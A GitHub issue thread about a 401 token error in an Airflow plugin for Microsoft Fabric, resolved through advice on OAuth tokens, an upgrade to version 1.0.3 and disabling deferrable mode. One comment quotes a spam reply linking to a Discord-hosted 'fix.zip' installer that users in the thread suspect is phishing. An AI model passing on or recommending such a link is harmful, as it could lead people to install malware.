### ISSUE TITLE
requests.exceptions.HTTPError: 401 Client Error

### ISSUE THREAD

**Issue by dcsolus** [ambika-garg/apache-airflow-microsoft-fabric-plugin#10] opened 2024-09-03 05:45 UTC
Hi,

First, many thanks. I keep encountering the error below when I run my Dag so that I can't move on:

`File "/root/airflow-venv/lib/python3.10/site-packages/apache_airflow_microsoft_fabric_plugin/hooks/fabric.py", line 130, in _get_token_response.raise_for_status()
  File "/root/airflow-venv/lib/python3.10/site-packages/requests/models.py", line 1024, in raise_for_status
    raise HTTPError(http_error_msg, response=self) requests.exceptions.HTTPError: 401 Client Error: Unauthorized for url: https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token`

I double checked that there is no problem in the tenant_id. I also used 'refresh token' for the connection password. For the connection 'Extra', I used:
`{
  "tenantId": "<tenant_id>",
  "clientSecret": "<secret_value>",
  "scopes": "https://api.fabric.microsoft.com/Item.Execute.All, https://api.fabric.microsoft.com/Item.ReadWrite.All, offline_access, openid, profile"
}`

What seems to be a problem?

**Comment by dcsolus** [comment] 2024-09-03 05:49
> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

What the! Is this some kind of phishing? Your zip has been contaminated.

**Comment by Mjnstag** [comment] 2024-09-03 06:37
Hi dcsolus,
While I am not sure it would fix your issue, you could try removing the commas within your scopes variable as they arent needed as far as I am aware.

`{
"tenantId": "<tenant_id>",
"clientSecret": "<secret_value>",
"scopes": "https://api.fabric.microsoft.com/Item.Execute.All https://api.fabric.microsoft.com/Item.ReadWrite.All offline_access openid profile"
}`

Also, might I suggest that you remove the link in your reply since that said reply has been deleted so that others dont click it? Hopefully it didnt compromise anything.

**Comment by dcsolus** [comment] 2024-09-03 07:09
Hi Mjnstag,

Unfortunately, your suggestion for the scopes didn't work.

**Comment by Mjnstag** [comment] 2024-09-03 07:25
Hi dcsolus,
Perhaps it could be that you created the refresh token with different scopes than the ones you used to create the refresh token?

**Comment by ambika-garg** [comment] 2024-09-03 19:53
Hey @dcsolus,

Could you try running the API locally on Postman? This will help us determine whether the issue is with the refresh token scopes or with the plugin itself.

**Comment by dcsolus** [comment] 2024-09-04 02:42
Do you mean that I need to run the airflow connection on Postman?

**Comment by ambika-garg** [comment] 2024-09-04 03:42
Yea, 
1. Get the access token via OAuth process and store the refresh token for future use
2. Call [Job scheduler: Run on Demand item API](https://learn.microsoft.com/rest/api/fabric/core/job-scheduler/run-on-demand-item-job?tabs=HTTP) using the fetched token.

Let me know if you face any issues.

**Comment by dcsolus** [comment] 2024-09-05 05:33
Thanks for keeping me updated. I managed to get refresh token but when I run notebook using bear token authorization with the refresh token on Postman, I still have an error:

the http url interface I used:
`POST https://api.fabric.microsoft.com/v1/workspaces/{workspaceId}/items/{itemId}/jobs/instances?jobType={jobType}`

the response I've got:

`{
    "requestId": "5e3a43ef-8ef3-xxxx-xxxx-xxxxxxxxx",
    "errorCode": "InvalidToken",
    "message": "Access token is invalid"
}`

**Comment by ambika-garg** [comment] 2024-09-05 06:08
are you using the access token to call the api?

**Comment by dcsolus** [comment] 2024-09-05 07:51
Not really. I'm using refresh_token to call the api.

**Comment by ambika-garg** [comment] 2024-09-05 08:57
Access tokens should be used to call the APIs. Can you please try if "Fabric run on demand API" is working with your access token.

**Comment by dcsolus** [comment] 2024-09-10 06:33
I've successfully got refresh token to make a connection to Fabric in my self-hosted airflow. I used the sample Dag you've provided to run a simple notebook in Fabric. I've got some good news and bad news.

Good news:
 I was able to run the notebook, and saw it running successfully in Fabric monitor. 

Bad news:
 In airflow UI, Dag immediately spits out 'failed' while the notebook is running well in Fabric.

It seems that there is a bug while airflow and Fabric are communicating. I've consulted with MS Korea tech team and he said that he'll keep me posted. I was also advised to open a case report here.

**Comment by Mjnstag** [comment] 2024-09-10 06:53
Hey dcsolus, that error might have been fixed with the latest update of the library! #6 changed the way how the library waits when querying the status from immediately asking an api for a status on the notebook/pipeline. In this case it could be that the status wasnt yet available resulting in that failed status in airflow. This was changed to first waiting a certain amount of time based on your parameters before asking. This merged pr, at least in my case, resulted in that behaviour not occuring for me. Hopefully it will be the same for you when you update the library to the newest version

**Comment by dcsolus** [comment] 2024-09-11 02:01
> Hey dcsolus, that error might have been fixed with the latest update of the library! #6 changed the way how the library waits when querying the status from immediately asking an api for a status on the notebook/pipeline. In this case it could be that the status wasnt yet available resulting in that failed status in airflow. This was changed to first waiting a certain amount of time based on your parameters before asking. This merged pr, at least in my case, resulted in that behaviour not occuring for me. Hopefully it will be the same for you when you update the library to the newest version

Hi, Mjnstag, I don't quite follow what you are suggesting. I looked for a way of forcing the library to wait before it hastily results in 'failed status' but it was no use. Can  you be more specific? Here's my sample Dag below for your information.
`default_args = {
    "owner": "airflow",
    "start_date": days_ago(1),
}

with DAG(
    dag_id="fabric_items_dag",
    default_args=default_args,
    schedule_interval="@daily",
    catchup=False,
) as dag:

    run_notebook = FabricRunItemOperator(
        task_id="run_fabric_notebook",
        workspace_id=WORKSPACE_ID,
        item_id=ITEM_ID,
        fabric_conn_id="fabric_conn",
        job_type="RunNotebook",
        wait_for_termination=True,
        retry_delay=60,
        check_interval=60,
        deferrable=True,
    )

    run_notebook`

**Comment by ambika-garg** [comment] 2024-09-11 03:31
Hey @dcsolus, could you try using the latest plugin version, 1.0.3? The issue mentioned by you has been addressed in that update.

**Comment by dcsolus** [comment] 2024-09-11 04:45
It seems that the latest plugin version 1.0.3 works, but my Dag keeps its 'deferred' status forever.

What seems to be the problem? Here's my Dag as you suggested in your sample:
`run_notebook = FabricRunItemOperator(
        task_id="run_fabric_notebook",
        workspace_id=WORKSPACE_ID,
        item_id=ITEM_ID,
        fabric_conn_id="fabric_conn",
        job_type="RunNotebook",
        wait_for_termination=True,
        deferrable=True,
    )`

**Comment by ambika-garg** [comment] 2024-09-11 04:49
Did you enable Airflow triggers?

**Comment by ambika-garg** [comment] 2024-09-11 04:49
Or, you can set the deferrable to False.

**Comment by dcsolus** [comment] 2024-09-11 05:17
> Or, you can set the deferrable to False.

Many thanks. The latest update is working properly with 'deferrable' set False. I guess you can close this case.

**Comment by ambika-garg** [comment] 2024-09-11 06:08
I'm glad to hear that it's working for you! If you have any other questions or need further assistance, don't hesitate to reach out. If you found the plugin helpful, please consider starring the repository.

**Closed by ambika-garg** 2024-09-11 06:08 UTC
